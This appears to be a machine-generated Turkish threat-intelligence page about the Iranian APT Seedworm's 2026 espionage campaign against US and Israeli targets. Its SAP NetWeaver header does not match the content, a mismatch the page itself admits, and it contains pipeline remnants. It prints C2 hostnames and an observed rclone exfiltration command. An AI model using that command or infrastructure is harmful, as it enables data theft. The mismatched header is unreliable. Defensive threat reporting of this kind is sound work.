📅 10 Haz 2026 · 📰 SOCRadar / SAP Security Notes · 🎯 SAP NetWeaver AS ABAP — Finans, ERP, Bordro Sistemleri · TLP:WHITE
Başlık ve kart özetinde yer alan CVE-2026-44748 numaralı SAP NetWeaver zafiyeti ile sağlanan kaynak içeriği arasında doğrudan bir ilişki bulunmamaktadır. Verifier notu ve raw_content incelendiğinde, kaynağın SAP NetWeaver ya da SAML imza sarmalama tekniğini değil; İranlı APT grubu Seedworm (diğer adlarıyla MuddyWater, Temp Zagros, Static Kitten) tarafından Şubat 2026'dan itibaren yürütülen siber casusluk kampanyasını ele aldığı görülmektedir. Bu nedenle bu detay sayfası raw_content'e uygun biçimde Seedworm kampanyası üzerine hazırlanmıştır.
Symantec/Broadcom Tehdit İstihbaratı ekibinin Haziran 2026'da yayımladığı rapora göre Seedworm grubu, Şubat 2026 başından itibaren bir ABD bankası, bir ABD havalimanı, bir ABD'li savunma-havacılık yazılım şirketinin İsrail operasyonu ve ABD ile Kanada'daki kar amacı gütmeyen kuruluşların ağlarında aktif olduğu tespit edilmiştir. Saldırganlar iki farklı özel arka kapı kullandı: 'Dindoor' (Deno çalışma zamanı tabanlı, JavaScript/TypeScript ile çalışan) ve 'Fakeset' (Python tabanlı). Her iki arka kapı da 'Amy Cherne' adına düzenlenmiş kod imzalama sertifikasıyla imzalanmıştır; Fakeset ayrıca daha önce Seedworm ile ilişkilendirilmiş zararlı yazılımları imzalamak için kullanılan 'Donald Gay' sertifikasını da taşımaktadır. Kampanyanın en son eylemlerin ardından da devam etmesi, grubun hedeflenen ağlarda tutunmayı sürdürdüğüne işaret etmektedir.
Teknik analiz açısından Dindoor arka kapısı, Deno'nun meşru çalışma zamanı ortamını kötüye kullanarak tespitten kaçınmakta ve geleneksel antivirüs imza tabanlı algılamayı zorlaştırmaktadır. Fakeset arka kapısı ise Backblaze bulut depolama altyapısını komuta-kontrol (C2) kanalı olarak kullanmakta; aşağıdaki sunuculardan indirilmektedir: ``` gitempire.s3.us-east-005.backblazeb2.com elvenforest.s3.us-east-005.backblazeb2.com ``` Veri dışarı sızdırma girişiminde ise Rclone aracı Wasabi bulut depolama servisine yönlendirilmiş, komut yapısı şu şekilde gözlemlenmiştir: ``` rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x ``` Bu yaklaşım, saldırganların meşru bulut hizmetlerini veri transferi için proxy olarak kullanarak ağ trafiği denetimlerini atlatma eğilimini net biçimde ortaya koymaktadır.
Seedworm, 2017'den bu yana faaliyet gösteren ve İran İstihbarat ve Güvenlik Bakanlığı'na (MOIS) bağlı olduğu CISA tarafından teyit edilmiş bir APT grubudur. Grup; Orta Doğu'daki ilk hedeflerinin ötesine geçerek telekomünikasyon, savunma, yerel yönetim ile petrol ve doğalgaz sektörlerini Asya, Afrika, Avrupa ve Kuzey Amerika'da hedef almaktadır. Stagecomp ve Darkcomp zararlı yazılım aileleri de bu kampanyayla bağlantılı olup Google, Microsoft ve Kaspersky gibi bağımsız araştırmacı kuruluşlar bu araçları Seedworm'a atfetmiştir. Şubat-Mart 2026'da ABD-İsrail ortak askeri operasyonlarının İran'a yönelik başlatılmasının ardından grubun kritik ABD ve İsrail altyapısında önceden tesis ettiği erişim noktaları, hem casusluk hem de potansiyel yıkıcı siber saldırı için ciddi bir hazırlık kapasitesine işaret etmektedir.
Finans sektörü için risk değerlendirmesi özellikle yüksektir; zira kampanyanın doğrudan hedefleri arasında bir ABD bankası yer almaktadır. Kuveyt Türk gibi Orta Doğu ve Körfez bölgesinde faaliyet gösteren finans kuruluşlarının İranlı APT gruplarının coğrafi genişleme eğilimi göz önünde bulundurulduğunda savunma duruşunu güçlendirmesi kritik önem taşımaktadır. İngiltere Ulusal Siber Güvenlik Merkezi (NCSC) ve Check Point'in uyarıları, İran bağlantılı hacktivist grupların (örn. Handala) Starlink gibi alternatif altyapılar üzerinden operasyonel sürekliliğini koruduğunu teyit etmektedir.